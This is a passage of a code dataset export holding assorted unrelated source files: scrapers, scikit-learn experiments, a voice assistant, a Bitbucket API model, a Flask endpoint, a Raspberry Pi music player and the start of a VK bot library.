poi_definition[PROPERTIES_HEADER_ROW]\n\n            for property_definitions in poi_definition[PROPERTIES_VALUES_ROW_START:]:\n                property = {}\n                for col, header in properties_headers.items():\n                    property[header] = property_definitions[col]\n                definition.properties.append(property)\n\n        return definition\n\n    @staticmethod\n    def hasProperties(poi_definition):\n        PROPERTIES_HEADER_ROW = 3\n        return len(poi_definition) > PROPERTIES_HEADER_ROW\n","sub_path":"openbis_standard_technologies/dist/core-plugins/xls-import/1/as/services/xls-import-api/parsers/to_definition/poi_to_definition/definition_parsers.py","file_name":"definition_parsers.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"526408391","text":"# -*- coding: utf-8 -*-\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\nfrom get_md5 import gethash\r\nfrom datetime import date\r\n\r\ndef get_schedule(url):\r\n    html = urllib.request.urlopen(url)\r\n    soup = BeautifulSoup(html,\"lxml\")\r\n    c = \"http://solidemo.jp/schedule/\"\r\n    try:\r\n        return [[int(i.parent.get(\"class\")[1][3:]),\r\n                i.text,\r\n                c + i.next.next.next.next.get(\"href\")[2:],\r\n                i.next.next.next.next.text] for i in 
soup.findAll(\"span\")[3:-1]]\r\n except:\r\n return []\r\n \r\ndef get_detail(url,title):\r\n html = urllib.request.urlopen(url)\r\n soup = BeautifulSoup(html,\"lxml\")\r\n try:\r\n body = soup.select(\"#contents > div.block\")[0].text\r\n body = body[body.find(\"tw,fl\")+9:]\r\n except:\r\n body = \"\"\r\n return [gethash(title+body),body.strip()]\r\n\r\ndef return_list(dt):\r\n url = \"http://solidemo.jp/schedule/index.php?viewmode=&type=all&year=\"+str(dt.year)+\"&month=\"+str(dt.month)\r\n try:\r\n return [[date(year=dt.year,month=dt.month,day=int(i[0])),i[1],i[3],i[2]] + get_detail(i[2],i[3]) for i in get_schedule(url)]\r\n except:\r\n return []\r\n \r\nif __name__ == \"__main__\":\r\n d = return_list(date(year=2016,month=11,day=1))\r\n for i in d:\r\n print(i[5].encode(\"cp932\",\"ignore\").decode(\"cp932\"))\r\n","sub_path":"calendar_parser/parser_solidemo.py","file_name":"parser_solidemo.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"576371441","text":"\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import tree, neighbors, datasets\r\nfrom sklearn.metrics import accuracy_score\r\nimport pickle\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.svm import SVC\r\n\r\niris=datasets.load_iris()\r\nx=iris.data\r\ny=iris.target\r\n\r\n'''\r\nprint(len(x[0]))\r\nprint(x[0])\r\nprint(type(x))\r\n'''\r\n\r\ntree_classifier=tree.DecisionTreeClassifier()\r\nneighbor_classifier=neighbors.KNeighborsClassifier()\r\nlogisticRegression_classifier = LogisticRegression(solver='liblinear', multi_class='ovr')\r\nlda_classifier = LinearDiscriminantAnalysis()\r\ngaussian_classifier = GaussianNB()\r\nsvc_classifier = SVC(gamma='auto')\r\n\r\nsplits = [0.1*i for i in range(1,10)]\r\ntree_accuracies = []\r\nneighbor_accuracies = []\r\nlogisticRegression_accuracies = []\r\nlda_accuracies = []\r\ngaussian_accuracies = []\r\nsvc_accuracies = []\r\n\r\n#print(splits)\r\n\r\nfor i in range(9):\r\n split = splits[i]\r\n\r\n x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=split)\r\n #print(len(x_train))\r\n\r\n\r\n\r\n tree_classifier.fit(x_train,y_train)\r\n neighbor_classifier.fit(x_train,y_train)\r\n logisticRegression_classifier.fit(x_train,y_train)\r\n lda_classifier.fit(x_train,y_train)\r\n gaussian_classifier.fit(x_train,y_train)\r\n svc_classifier.fit(x_train,y_train)\r\n\r\n tree_predictions=tree_classifier.predict(x_test)\r\n neighbor_predictions = neighbor_classifier.predict(x_test)\r\n logisticRegression_predictions = logisticRegression_classifier.predict(x_test)\r\n lda_predictions = lda_classifier.predict(x_test)\r\n gaussian_predictions = gaussian_classifier.predict(x_test)\r\n svc_predictions = svc_classifier.predict(x_test)\r\n\r\n '''\r\n print(type(tree_predictions))\r\n print(len(tree_predictions))\r\n print(tree_predictions[:10])\r\n '''\r\n\r\n tree_accuracy = accuracy_score(y_test,tree_predictions)\r\n neighbor_accuracy = accuracy_score(y_test,neighbor_predictions)\r\n logisticRegression_accuracy = accuracy_score(y_test, logisticRegression_predictions)\r\n lda_accuracy = accuracy_score(y_test, lda_predictions)\r\n gaussian_accuracy = accuracy_score(y_test, gaussian_predictions)\r\n svc_accuracy = accuracy_score(y_test, svc_predictions)\r\n \r\n print(\"split: \",split)\r\n print(\"tree 
accuracy: \",tree_accuracy)\r\n print(\"neighbor accuracy: \",neighbor_accuracy)\r\n print(\"log.Regression acc: \",logisticRegression_accuracy)\r\n print(\"lda acc: \",lda_accuracy)\r\n print(\"gaussian acc: \",gaussian_accuracy)\r\n print(\"svc acc: \",svc_accuracy)\r\n print(\"-------------------------------\")\r\n \r\n tree_accuracies.append(tree_accuracy)\r\n neighbor_accuracies.append(neighbor_accuracy)\r\n logisticRegression_accuracies.append(logisticRegression_accuracy)\r\n lda_accuracies.append(lda_accuracy)\r\n gaussian_accuracies.append(gaussian_accuracy)\r\n svc_accuracies.append(svc_accuracy)\r\n\r\nprint(tree_accuracies)\r\nprint(neighbor_accuracies)\r\nprint(logisticRegression_accuracies)\r\nprint(lda_accuracies)\r\nprint(gaussian_accuracies)\r\nprint(svc_accuracies)\r\n\r\ntree_accuracies = np.array(tree_accuracies)\r\nneighbor_accuracies = np.array(neighbor_accuracies)\r\nlogisticRegression_accuracies = np.array(logisticRegression_accuracies)\r\nlda_accuracies = np.array(lda_accuracies)\r\ngaussian_accuracies = np.array(gaussian_accuracies)\r\nsvc_accuracies = np.array(svc_accuracies)\r\nsplits = np.array(splits)\r\n\r\ntree_pickle = 'tree_accuracies.pickle'\r\nneighbor_pickle = 'neighbor_accuracies.pickle'\r\nsplit_pickle = 'splits.pickle'\r\nlogRegression_pickle = 'logisticRegression.pickle'\r\nlda_pickle = 'lda.pickle'\r\ngaussian_pickle = 'gaussian.pickle'\r\nsvc_pickle = 'svc.pickle'\r\n\r\nwith open(tree_pickle, 'wb') as f:\r\n pickle.dump(tree_accuracies, f)\r\n\r\nwith open(neighbor_pickle, 'wb') as f:\r\n pickle.dump(neighbor_accuracies, f)\r\n\r\nwith open(logRegression_pickle, 'wb') as f:\r\n pickle.dump(logisticRegression_accuracies, f)\r\n\r\nwith open(lda_pickle, 'wb') as f:\r\n pickle.dump(lda_accuracies, f)\r\n\r\nwith open(gaussian_pickle, 'wb') as f:\r\n pickle.dump(gaussian_accuracies, f)\r\n\r\nwith open(svc_pickle, 'wb') as f:\r\n pickle.dump(svc_accuracies, f)\r\n\r\nwith open(split_pickle, 'wb') as f:\r\n pickle.dump(splits, f)","sub_path":"Iris Play/mediumIris.py","file_name":"mediumIris.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"605812797","text":"\r\n\r\nimport FNDphase1webscrap as ws\r\n\r\n# Compare two news\r\n\r\nimport nltk\r\n\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.tokenize import word_tokenize\r\n \r\ndef match_news(news1, news2):\r\n \r\n # tokenization\r\n news1_list = word_tokenize(news1) \r\n news2_list = word_tokenize(news2)\r\n \r\n # sw contains the list of stopwords\r\n sw = stopwords.words('english') \r\n lst1 =[]\r\n lst2 =[]\r\n \r\n # remove stop words from the string\r\n news1_set = {w for w in news1_list if not w in sw} \r\n news2_set = {w for w in news2_list if not w in sw}\r\n \r\n # form a set containing keywords of both strings \r\n rvector = news1_set.union(news2_set) \r\n for w in rvector:\r\n if w in news1_set: \r\n lst1.append(1) # create a vector\r\n else: \r\n lst1.append(0)\r\n if w in news2_set:\r\n lst2.append(1)\r\n else:\r\n lst2.append(0)\r\n \r\n \r\n c = 0\r\n # cosine formula \r\n for i in range(len(rvector)):\r\n c+= lst1[i]*lst2[i]\r\n cosine = c / float((sum(lst1)*sum(lst2))**0.5)\r\n #print(\"similarity: \", cosine)\r\n \r\n return cosine\r\n\r\n# match_news(\"i love chinies food\", 'i hate chinies food')\r\nnews1 = 'Tesla in Russia? 
Elon Musk says he is keen to open production hub for EVs'\r\nnews2 = \"Elon Musk said at a Kremlin conference that Tesla could build a factory in Russia: 'I think we're close to establishing a Tesla presence'\"\r\n\r\n#match_news(news1, news2)\r\n\r\nDATA_TO_COMPARE = []\r\n\r\nDATA = ws.DATA_SCRAPPED\r\nfor e in DATA:\r\n # print(\" >> >> \", e)\r\n v = match_news(e, news1)\r\n if v > 0.15:\r\n # print(\" >> >> \", e, \"\\n\\t\\t >> \", v)\r\n DATA_TO_COMPARE.append(e)\r\n \r\n \r\n#print(DATA_TO_COMPARE)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"FNDphase1match.py","file_name":"FNDphase1match.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"580814297","text":"# -*- coding: utf-8 -*-\n\n#Librairies\nimport os\nfrom gtts import gTTS #a besoin d'une connexion internet pour etre utilise\n\ndef init():\n \"\"\"\n Fonction init():\n Parametre : none\n Definition des variables globales de l'application.\n \"\"\"\n global verb_exec_app\n global mot_exec_app\n verb_exec_app=['ouvre','ouvrir','execute','executer']\n mot_exec_app=['spotify','atom','nmap']\n\n#fonctions\ndef main():\n init()\n\n start=input() #test avec saisie et non avec micro\n\n if checkStart(start): #check si jarvis est appelé\n phrase=input()\n res = analysePhrase(phrase)\n if res == 0:\n print(\"Error: Action Inconnue \\n\")\n elif res == 1:\n print(\"Error: Application Inconnue \\n\")\n elif res == 2:\n print(\"No Error \\n\")\n\n\ndef checkStart(start_user): #check jarvis call\n \"\"\"\n Fonction checkStart():\n Parametre : str[]\n Definition: Prend en parametre la saisie de l'utilisateur des le premier demarrage et check si le premier mot est \"jarvis\"\n Return True si le mot est jarvis et False si non.\n \"\"\"\n Mot_user = start_user.split()#split de la phrase\n\n if Mot_user[0] == \"jarvis\" or Mot_user[0] == \"JARVIS\" or Mot_user[0] == \"Jarvis\" : #check si jarvis est appelé\n\n Talk(\"Bonjour ! que puis-je faire pour vous ?\") #voir pour randomiser la phrase de début\n\n #print(\"Bonjour ! que puis-je faire pour vous ?\")\n\n return True\n\n elif Mot_user[0] ==\"exit\":\n\n return False\n\n #FIif\n#FIcheckStart\n\ndef estunVerbe(mot):\n \"\"\"\n Fonction estunVerbe():\n Parametre : str\n Definition: Prend en Parametre un mot et check si celui si est dans la liste des verbes (Global verb_exec_app)\n Return True si le mot est dans le tableau et False si non.\n \"\"\"\n if mot in verb_exec_app:\n return True\n else:\n return False\n #FIif\n#FIestunVerbe\n\ndef estuneApp(mot):\n \"\"\"\n Fonction estuneApp():\n Parametre : str\n Definition: Prend en Parametre un mot et check si celui si est dans la liste des applications (Global mot_exec_app)\n Return True si le mot est dans le tableau et False si non.\n \"\"\"\n if mot in mot_exec_app: #global variable\n return True\n else:\n return False\n #FIif\n#FIestuneApp\n\ndef Talk(audio):\n \"\"\"\n Fonction Talk():\n Parametre : str[]\n Definition: Prend en parametre un texte pour l'enregistrer au format mp3 et ensuite le lire par la librairie gTTs\n \"\"\"\n print(audio)\n tts = gTTS(text=audio, lang='fr')\n tts.save(\"talk.mp3\")\n os.system(\"mpg123 talk.mp3\")\n#FITalk\n\ndef analysePhrase(phrase_user): #check sentence user\n\n \"\"\"Fonction analysePhrase():\n Parametre : str[]\n Definition: Prend en parametre la phrase de l'utilisateur.\n Check si elle contient un verbe d'action. 
check si elle contient une application a executer\n Return 0 si il n'y a pas de verbe connue par le script.\n Return 1 si il n'y a pas d'aplication connue par le script\n Return 2 si tout est ok\"\"\"\n\n run_app=\"\"\n test=\"\"\n check=0\n mots_user = phrase_user.split() #on split les mots\n nbmots_user = len(phrase_user.split())\n\n #for\n for i in range(nbmots_user):\n\n if estunVerbe(mots_user[i]):\n test=\"Très bien, j'execute \"\n check=1\n elif estuneApp(mots_user[i]):\n test += mots_user[i]\n run_app=mots_user[i]\n else:\n pass\n #FIif\n\n #FIfor\n if check==0:\n notunderstand=\"Je n'ai pas compris votre demande\"\n Talk(notunderstand)\n return 0\n elif run_app==\"\":\n run_app=\"Oups, je crois que je ne connais pas encore cette application\"\n Talk(run_app)\n #print(run_app)\n return 1\n else:\n print(test)\n Talk(test)\n os.system(run_app)\n return 2\n#FIanalysePhrase()\n\n\n#Start\nmain()\n","sub_path":"jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"202767845","text":"#!/usr/bin/env python\n\n# Copyright 2016 François 'ftiff' Levaux-Tiffreau\n# \n# Set a list of certificate names you expect to have. \n# This script will output the list of certs that are missing.\n# eg. Missing certificate(s): [''MyDummyCert1]\n\nimport subprocess\n\ncertificate_names = [\n 'MyDummyCert1',\n 'MyDummyCert2'\n]\n\nmissing_certificates = []\n\nfor certificate in certificate_names:\n result = subprocess.call([\n 'security',\n 'find-certificate',\n '-c',\n certificate\n ], stdin=None, stdout=None, stderr=None)\n #print('{} -> {}'.format(certificate, result))\n if result != 0:\n missing_certificates.append(certificate)\n \n\nif missing_certificates:\n print('Missing certificate(s): {}'.format(missing_certificates))\nelse:\n print('Certificates: OK!')\n","sub_path":"ExtensionAttributes/check_certificates.py","file_name":"check_certificates.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"267877578","text":"# coding: utf-8\n\n\"\"\"\n Bitbucket API\n\n Code against the Bitbucket API to automate simple tasks, embed Bitbucket data into your own site, build mobile or desktop apps, or even add custom UI add-ons into Bitbucket itself using the Connect framework. 
# noqa: E501\n\n The version of the OpenAPI document: 2.0\n Contact: support@bitbucket.org\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass PipelineVariable(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'key': 'str',\n 'secured': 'bool',\n 'uuid': 'str',\n 'value': 'str'\n }\n\n attribute_map = {\n 'key': 'key',\n 'secured': 'secured',\n 'uuid': 'uuid',\n 'value': 'value'\n }\n\n def __init__(self, key=None, secured=None, uuid=None, value=None): # noqa: E501\n \"\"\"PipelineVariable - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._key = None\n self._secured = None\n self._uuid = None\n self._value = None\n self.discriminator = None\n\n if key is not None:\n self.key = key\n if secured is not None:\n self.secured = secured\n if uuid is not None:\n self.uuid = uuid\n if value is not None:\n self.value = value\n\n @property\n def key(self):\n \"\"\"Gets the key of this PipelineVariable. # noqa: E501\n\n The unique name of the variable. # noqa: E501\n\n :return: The key of this PipelineVariable. # noqa: E501\n :rtype: str\n \"\"\"\n return self._key\n\n @key.setter\n def key(self, key):\n \"\"\"Sets the key of this PipelineVariable.\n\n The unique name of the variable. # noqa: E501\n\n :param key: The key of this PipelineVariable. # noqa: E501\n :type: str\n \"\"\"\n\n self._key = key\n\n @property\n def secured(self):\n \"\"\"Gets the secured of this PipelineVariable. # noqa: E501\n\n If true, this variable will be treated as secured. The value will never be exposed in the logs or the REST API. # noqa: E501\n\n :return: The secured of this PipelineVariable. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._secured\n\n @secured.setter\n def secured(self, secured):\n \"\"\"Sets the secured of this PipelineVariable.\n\n If true, this variable will be treated as secured. The value will never be exposed in the logs or the REST API. # noqa: E501\n\n :param secured: The secured of this PipelineVariable. # noqa: E501\n :type: bool\n \"\"\"\n\n self._secured = secured\n\n @property\n def uuid(self):\n \"\"\"Gets the uuid of this PipelineVariable. # noqa: E501\n\n The UUID identifying the variable. # noqa: E501\n\n :return: The uuid of this PipelineVariable. # noqa: E501\n :rtype: str\n \"\"\"\n return self._uuid\n\n @uuid.setter\n def uuid(self, uuid):\n \"\"\"Sets the uuid of this PipelineVariable.\n\n The UUID identifying the variable. # noqa: E501\n\n :param uuid: The uuid of this PipelineVariable. # noqa: E501\n :type: str\n \"\"\"\n\n self._uuid = uuid\n\n @property\n def value(self):\n \"\"\"Gets the value of this PipelineVariable. # noqa: E501\n\n The value of the variable. If the variable is secured, this will be empty. # noqa: E501\n\n :return: The value of this PipelineVariable. # noqa: E501\n :rtype: str\n \"\"\"\n return self._value\n\n @value.setter\n def value(self, value):\n \"\"\"Sets the value of this PipelineVariable.\n\n The value of the variable. If the variable is secured, this will be empty. # noqa: E501\n\n :param value: The value of this PipelineVariable. 
# noqa: E501\n :type: str\n \"\"\"\n\n self._value = value\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, PipelineVariable):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"bitbucketopenapi/models/pipeline_variable.py","file_name":"pipeline_variable.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"85257015","text":"from flask import Flask, request, jsonify, Response\nimport numpy as np\napp = Flask(__name__)\nimport base64\nimport matplotlib.pyplot as plt\nimport cv2\n\n\n@app.route('/trackHeadTask', methods=['POST'])\ndef trackHeadTask():\n file = request.files['file']\n imageStr = base64.b64encode(file.read())\n imageDict = {'image': imageStr}\n print(imageDict)\n imgByte = base64.b64decode(imageStr)\n npArray = np.asarray(bytearray(imgByte))\n img = cv2.imdecode(npArray, cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n print(img.shape)\n plt.imshow(img)\n plt.show()\n return (jsonify(), 200)\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')\n response.headers.add('Access-Control-Allow-Methods', 'GET,POST') # Put any other methods you need here\n return response\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=6006)","sub_path":"ServerTest.py","file_name":"ServerTest.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"406258988","text":"#!/usr/bin/env python\n# coding=utf-8\nimport time,threading,self_function\nimport encodings.idna,sixmic_control,navigation_model\n\ndef get_status_information():\n while True:\n try:\n #运动导航状态信息监控\n navigation_model.status_navigtion_monitor()\n navigation_model.status_status_monitor()\n except Exception as e :\n with open('zjgg_err.txt','a') as code:\n code.write(str(e) + 'get_status_information \\n')\n \ndef deal_status():\n while True:\n try:\n #语音信息处理\n self_function.voice_deal_status()\n #运动信息处理\n self_function.motion_deal_status()\n except Exception as e :\n with open('zjgg_err.txt','a') as code:\n code.write(str(e) + 'deal_status \\n')\n\nif __name__ == '__main__':\n try:\n sixmic_control.port_open()\n \n i =3\n while(i):\n sixmic_control.send(sixmic_control.buildShakePacket())\n time.sleep(1)\n i -= 1\n print(\"开始运行了!\")\n \n #t1 = threading.Thread(target = 
navigation_model.status_navigtion_monitor)\n t2 = threading.Thread(target = navigation_model.status_monitor)\n t3 = threading.Thread(target = deal_status)\n t4 = threading.Thread(target = sixmic_control.receive_voice)\n Threads = [t2,t3,t4]\n for t in Threads:\n t.start()\n \n self_function.zjgg_presentation()\n \n except Exception as e:\n with open('zjgg_err.txt','a') as code:\n code.write(str(e) + 'zjgg_err \\n')\n \n","sub_path":"presentation_project_model/更改导航程序/zjgg_presentation.py","file_name":"zjgg_presentation.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"39379768","text":"# COMECE COPIANDO AQUI O SEU CÓDIGO DA IMPLEMENTAÇÃO\n# DEPOIS FAÇA OS NOVOS RECURSOS# importação de bibliotecas\nfrom os import system\nfrom mplayer import Player\nfrom gpiozero import LED\nfrom gpiozero import Button\nfrom time import sleep\nfrom Adafruit_CharLCD import Adafruit_CharLCD\n# para de tocar músicas que tenham ficado tocando da vez passada\nsystem(\"killall mplayer\")\n\n\n# definição de funções\n\ndef Play():\n player.pause()\n if player.paused:\n led1.blink()\n else:\n led1.on()\n\ndef Avança():\n player.speed=2\n\ndef Passa():\n if player.speed == 1:\n player.pt_step(1)\n else:\n player.speed = 1\n\ndef Recua():\n if player.time_pos>2:\n player.time_pos=0\n else:\n player.pt_step(-1)\n\n\n\n# criação de componentes\nplayer = Player()\nplayer.loadlist(\"playlist.txt\")\n\nb1 = Button(11)\nb1.when_pressed = Recua\nb2 = Button(12)\nb2.when_pressed = Play\nb3 = Button(13)\nb3.when_held = Avança\nb3.when_released = Passa\nled1 = LED(21)\nled3 = LED(23)\nled3.off()\nled1.on()\nlcd = Adafruit_CharLCD(2, 3, 4, 5, 6, 7, 16, 2)\npos = player.time_pos\nn=0\n# loop infinito\nwhile True:\n pos = player.time_pos\n Mpos = pos/60\n Spos = pos%60\n t = player.length\n Mt = t/60\n St = t%60\n metadados = player.metadata\n if metadados !=None:\n lcd.clear()\n \n lcd.message(metadados[\"Title\"][n:16+n] + \"\\n\" + \"%.2d\" % Mpos + \":\" + \"%.2d\" % Spos + \" de %.2d\" %Mt + \":%.2d\" %St)\n if (len(metadados[\"Title\"])-n)> 16:\n n += 1\n else:\n n=0\n sleep(0.2)\n\n","sub_path":"Lab01/01c_aperfeicoamento.py","file_name":"01c_aperfeicoamento.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"331764976","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param root: the root of binary tree\n @param v: a integer\n @param d: a integer\n @return: return a TreeNode\n \"\"\"\n\n def addOneRow(self, root, v, d):\n # write your code here\n def sol1(): # dfs\n def insert(val, node, depth, n):\n if not node: return\n if depth == n - 1:\n node.left, node.left.left = TreeNode(val), node.left\n node.right, node.right.right = TreeNode(val), node.right\n else:\n insert(val, node.left, depth + 1, n)\n insert(val, node.right, depth + 1, n)\n\n if d == 1:\n node = TreeNode(v)\n node.left = root\n return node\n insert(v, root, 1, d)\n return root\n\n def sol2(): # bfs\n if d == 1:\n node = TreeNode(v)\n node.left = root\n return node\n queue, depth = [root], 1\n while depth < d - 1:\n tmp = []\n while queue:\n node = queue.pop()\n if node.left: tmp.append(node.left)\n if node.right: tmp.append(node.right)\n queue = tmp\n depth += 1\n while queue:\n node = queue.pop()\n node.left, node.left.left = 
TreeNode(v), node.left\n                node.right, node.right.right = TreeNode(v), node.right\n            return root\n\n        return sol1()\n","sub_path":"lintcode/1122-add-one-row-to-tree.py","file_name":"1122-add-one-row-to-tree.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"419576096","text":"\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2019 MrDandycorn\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the\nSoftware is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\nDEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport asyncio\nimport sys\nimport traceback\nimport aiohttp\nimport enum\nfrom random import randint\n\nfrom vk_botting.general import vk_request\nfrom vk_botting.user import get_own_page, get_pages, get_users, get_blocked_user, get_unblocked_user, User\nfrom vk_botting.group import get_post, get_board_comment, get_market_comment, get_photo_comment, get_video_comment, get_wall_comment, get_deleted_photo_comment,\\\n    get_deleted_video_comment, get_deleted_board_comment, get_deleted_market_comment, get_deleted_wall_comment, get_officers_edit, get_poll_vote, get_groups, Group\nfrom vk_botting.attachments import get_photo, get_video, get_audio\nfrom vk_botting.message import build_msg, build_user_msg\nfrom vk_botting.states import get_state\nfrom vk_botting.exceptions import VKApiError, LoginError\n\n\nclass UserMessageFlags(enum.IntFlag):\n    Unread = 1,\n    Outbox = 2,\n    Replied = 4,\n    Important = 8,\n    Chat = 16,\n    Friends = 32,\n    Spam = 64,\n    Deleted = 128,\n    Fixed = 256,\n    Media = 512,\n    Hidden = 65536,\n    DeleteForAll = 131072,\n    NotDelivered = 262144\n\n\nclass _ClientEventTask(asyncio.Task):\n    def __init__(self, original_coro, event_name, coro, *, loop):\n        super().__init__(coro, loop=loop)\n        self.__event_name = event_name\n        self.__original_coro = original_coro\n\n    def __repr__(self):\n        info = [\n            ('state', self._state.lower()),\n            ('event', self.__event_name),\n            ('coro', repr(self.__original_coro)),\n        ]\n        if self._exception is not None:\n            info.append(('exception', repr(self._exception)))\n        return '<ClientEventTask {}>'.format(' '.join('%s=%s' % t for t in info))\n\n\nclass Client:\n\n    def __init__(self, **kwargs):\n        self.v = kwargs.get('v', '5.999')\n        self.force = kwargs.get('force', False)\n        self.loop = asyncio.get_event_loop()\n        self.user = None\n        self.group = None\n        self.key = None\n        self.server = None\n        self.old_longpoll = kwargs.get('old_longpoll', False)\n        self._listeners = {}\n        timeout = aiohttp.ClientTimeout(total=100, connect=10)\n        self.session = aiohttp.ClientSession(timeout=timeout)\n        self._implemented_events = ['message_new', 
'message_reply', 'message_allow', 'message_deny', 'message_edit', 'message_typing_state', 'photo_new', 'audio_new', 'video_new', 'wall_reply_new', 'wall_reply_edit', 'wall_reply_delete', 'wall_reply_restore', 'wall_post_new', 'wall_repost', 'board_post_new', 'board_post_edit', 'board_post_restore', 'board_post_delete', 'photo_comment_new', 'photo_comment_edit', 'photo_comment_delete', 'photo_comment_restore', 'video_comment_new', 'video_comment_edit', 'video_comment_delete', 'video_comment_restore', 'market_comment_new', 'market_comment_edit', 'market_comment_delete', 'market_comment_restore', 'poll_vote_new', 'group_join', 'group_leave', 'group_change_settings', 'group_change_photo', 'group_officers_edit', 'user_block', 'user_unblock']\n\n def Payload(self, **kwargs):\n kwargs['access_token'] = self.token\n kwargs['v'] = self.v\n return kwargs\n\n class botCommandException(Exception):\n pass\n\n def wait_for(self, event, *, check=None, timeout=None):\n future = self.loop.create_future()\n if check is None:\n def _check(*args):\n return True\n check = _check\n\n ev = event.lower()\n try:\n listeners = self._listeners[ev]\n except KeyError:\n listeners = []\n self._listeners[ev] = listeners\n\n listeners.append((future, check))\n return asyncio.wait_for(future, timeout, loop=self.loop)\n\n async def general_request(self, url, post=False, **params):\n for param in list(params):\n if params[param] is None:\n params.pop(param)\n elif not isinstance(params[param], (str, int)):\n params[param] = str(params[param])\n elif isinstance(params[param], bool):\n params[param] = str(params[param])\n for tries in range(5):\n try:\n req = self.session.post(url, data=params) if post else self.session.get(url, params=params)\n async with req as r:\n if r.content_type == 'application/json':\n return await r.json()\n return await r.text()\n except Exception as e:\n print(f'Got exception in request: {e}\\nRetrying in {tries*2+1} seconds', file=sys.stderr)\n await asyncio.sleep(tries*2+1)\n\n async def vk_request(self, method, **kwargs):\n res = await self.general_request(f'https://api.vk.com/method/{method}', **self.Payload(**kwargs))\n error = res.get('error', None)\n if error and error['error_code'] == 6:\n await asyncio.sleep(1)\n return await self.vk_request(method, **kwargs)\n return res\n\n async def enable_longpoll(self):\n events = dict([(event, 1) for event in self._implemented_events])\n res = await self.vk_request('groups.setLongPollSettings', group_id=self.group.id, enabled=1, api_version='5.103', **events)\n return 